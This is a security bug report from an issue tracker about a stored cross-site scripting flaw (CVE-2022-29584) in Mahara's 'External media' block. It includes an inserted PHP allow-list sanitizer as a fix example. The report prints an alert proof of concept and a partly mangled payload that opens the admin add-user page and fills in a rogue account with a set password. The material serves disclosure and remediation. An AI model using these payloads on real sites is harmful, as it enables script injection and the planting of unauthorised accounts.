XSS exploit in 'External media' block

Bug #1968920 reported by Kristina Hoeppner
This bug affects 1 person
Affects   Status         Importance   Assigned to   Milestone
Mahara    Fix Released   High         Gold
20.10     Fix Released   High         Unassigned
21.04     Fix Released   High         Unassigned
21.10     Fix Released   High         Unassigned
22.04     Fix Released   High         Gold

Bug Description

When you put the following into the 'External media' block, you get an alert pop-up window.

<a class="embedly-card" href="javascript:alert(document.domain)">Link</a>

In contrast to text blocks where the 'javascript:alert' is stripped out, this is not the case in 'External media'.

It wasn't a problem when the class wasn't present, but with the class, a pop-up with the current domain is displayed.

CVE References

description: updated
Changed in mahara:
status: New → Confirmed
importance: Undecided → High
Revision history for this message
Kristina Hoeppner (kris-hoeppner) wrote :

Example exploit:

<a class="embedly-card" href="javascript: {var TestFenster = http://window.open('../admin/users/add.php','TestWindow','width=800,height=800,left=100,top=50');function fill() {TestWindow.adduser.username.value='badboy';TestWindow.adduser.firstname.value='Bad';TestWindow.adduser.lastname.value='Boy';http://<email address hidden>';TestWindow.adduser.password.value='Secret+12345';https://t.co/f2YTjI3B9B();}TestWindow.addEventListener('load',fill);}">open the gate</a>

Note: I'm not sure about the 't.co' URL as that might have been converted from Twitter as it was sent via a DM.

---------------------

Things to keep in mind:

- we'd probably need to allow protocol-free URLs too, e.g. allow strings starting with 'http://', 'https://', and '://'
- sanitize the URL
- Alternatively, the sanity check could be done here:
/htdocs/blocktype/externalvideo/embed_services/embedly/embedservice.php#L61
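A server-side allow-list check of the kind the comment above suggests, added here as an example and not Mahara's own code (the check applied in the actual fix may differ); it assumes PHP 8 with the dom extension and treats "protocol free" as protocol-relative '//host/...' URLs:

```php
<?php
// Added example, not Mahara's own code; assumes PHP 8 with the dom extension.
// Allow-list check for an embedly-card href: only absolute http(s) URLs and
// protocol-relative '//host/...' URLs pass; a javascript: URL is rejected.
function is_safe_embed_url(string $url): bool
{
    // The href is an HTML attribute value: decode entities first so an
    // encoded 'javascript&#58;' is checked in its decoded form.
    $url = html_entity_decode($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    // Browsers skip leading/trailing whitespace and embedded control
    // characters when reading the scheme, so strip them before checking.
    $url = preg_replace('/[\x00-\x20\x7F]/', '', $url) ?? '';
    if ($url === '') {
        return false;
    }
    if (str_starts_with($url, '//')) {
        $url = 'https:' . $url;   // make protocol-relative URLs parseable
    }
    $scheme = parse_url($url, PHP_URL_SCHEME);
    $host   = parse_url($url, PHP_URL_HOST);
    return is_string($scheme)
        && in_array(strtolower($scheme), ['http', 'https'], true)
        && is_string($host) && $host !== '';
}

// Run the check over every <a class="embedly-card"> in a block's HTML and
// drop the href of any anchor that fails it; the link text is kept.
function sanitize_embedly_cards(string $html): string
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // HTML fragments emit harmless warnings
    $doc->loadHTML('<div id="wrap">' . $html . '</div>',
                   LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();
    $xpath = new DOMXPath($doc);
    $cards = $xpath->query('//a[contains(concat(" ", normalize-space(@class), " "), " embedly-card ")]');
    foreach ($cards as $a) {
        if (!is_safe_embed_url($a->getAttribute('href'))) {
            $a->removeAttribute('href');
        }
    }
    $out = '';
    foreach ($xpath->query('//div[@id="wrap"]')->item(0)->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

// The payload from the bug description, constructed here as sample input.
echo sanitize_embedly_cards('<a class="embedly-card" href="javascript:alert(document.domain)">Link</a>'), "\n";
```

The same check can be applied to the href before it reaches the embed service, which is the alternative location the comment above points at.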

Revision history for this message
Kristina Hoeppner (kris-hoeppner) wrote (last edit):

Vulnerability type: Cross-site scripting (XSS) / stored XSS
Attack type: Remote
Impact: Code execution

Affected components: The 'External media' block and anywhere you can enter HTML code, such as a text block, notes, journal entry, and forum post.

Suggested description: Mahara before 20.10.5, 21.04.4, 21.10.2, and 22.04.0 are vulnerable to stored cross-site scripting when a particular CSS class for embedly is used and JavaScript code is constructed to perform an action.

Reported by: Can't disclose
Bug report: https://bugs.launchpad.net/mahara/+bug/1968920
CVE reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29584

Robert Lyon (robertl-9)
no longer affects: mahara/20.10
no longer affects: mahara/22.10
Gold (gold.catalyst)
information type: Private Security → Public Security